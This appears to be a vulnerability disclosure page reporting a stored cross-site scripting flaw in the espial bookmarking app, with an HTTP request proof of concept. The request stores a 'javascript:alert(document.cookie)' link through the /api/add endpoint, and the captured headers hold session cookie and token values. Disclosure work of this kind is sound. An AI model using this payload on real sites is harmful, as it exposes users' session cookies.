Cross-site Scripting (XSS) - Stored in jonschoning/espial
Valid
Reported on
Sep 27th 2021
Description
Stored XSS in url link
Proof of Concept
// PoC reqest
POST /api/add HTTP/2
Host: esp.ae8.org
Cookie: _SESSION=SilFBialwul9V05BatfVPoUjOf0Klq8Ys0C/kWXvt6o2hKA8gHSKuInA6GCizZLuYIVindIkEq5wUOys/exSV06ByNuR6duw/qBMVA2BMC6evD1k/6RQLCjxm2AXjCJBjEU1jiXW/ZtTBdZyNhwPHI6SK4YClUoiIAfpXuUB+ysShu6Kx+8JCRK2igki/pHI6F/+nXgpt3fGW7Va9/SvIqFNzEtAmIpD0aNupcsEnpp9iG/gkml5J8HT3C0x8JMDRakuS+Em3a+6o9bkbptOS0nU9HVP5lGZsIygZXRB1w1wBE4dqVoXg21VwbARToY8VEbaJZV2CjiBQW8=; XSRF-TOKEN=dBcG59xtr68JUiaUpdwGp9pDUaszdEsgktplKRuf
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Xsrf-Token: dBcG59xtr68JUiaUpdwGp9pDUaszdEsgktplKRuf
Content-Type: application/json
Content-Length: 192
Origin: https://esp.ae8.org
Referer: https://esp.ae8.org/add?next=back
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"url":"javascript:alert(document.cookie)","toread":true,"title":"1234","time":null,"tags":"xss","slug":null,"selected":null,"private":true,"description":"902903","bid":null,"archiveUrl":null}
The XSS payload will trigger when user clicks the link.
Impact
This vulnerability is capable of stored XSS
We have contacted a member of the
jonschoning/espial
team and are waiting to hear back
2 years ago
to join this conversation